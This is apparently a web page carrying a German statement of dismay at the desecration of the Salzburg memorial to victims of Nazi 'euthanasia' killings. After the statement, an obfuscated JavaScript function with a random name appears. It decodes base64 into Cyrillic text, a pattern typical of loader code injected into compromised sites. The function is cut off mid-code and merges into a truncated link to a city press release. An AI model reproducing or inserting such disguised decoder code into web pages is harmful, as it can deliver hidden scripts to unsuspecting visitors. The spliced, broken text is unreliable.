Schändung des Euthanasie Denkmals in Salzburg

Ich teile meine Bestürzung über die Zerstörung des „Euthanasie“-Mahnmals in Salzburg mit. Es soll an jene Menschen erinnern, deren Leben gemäß der nationalsozialistischen Ideologie als „unwert“ beurteilt wurde. Diese Menschen wurden auch direkt  aus unseren Krankenhäusern, Pflegeheimen und mitten aus den Herzen unserer Familien gerissen. In dieser Zeit haben auch Ärzte und Ärztinnen an der gezielten Ermordung von als „unwert“ eingestuftem Leben aktiv und passiv mitgewirkt. Heute leben wir in einer freien, demokratischen, durch allgemein akzeptierte Grundwerte definierten Gesellschaft die das Recht auf ein freies Leben für alle garantiert. Der Angriff auf das  „Euthanasie“-Mahnmal stellt daher  auch einen Angriff auf die Mitte unserer Gesellschaft dar.
function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var vb=“;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandtat_euthanasie_mahnmal_im_k_404388.htm“>http://www.stadt-salzburg.at/internet/service/aktuell/aussendungen/2014/wieder_schandtat_euthanasie_mahnmal_im_k_404388.htm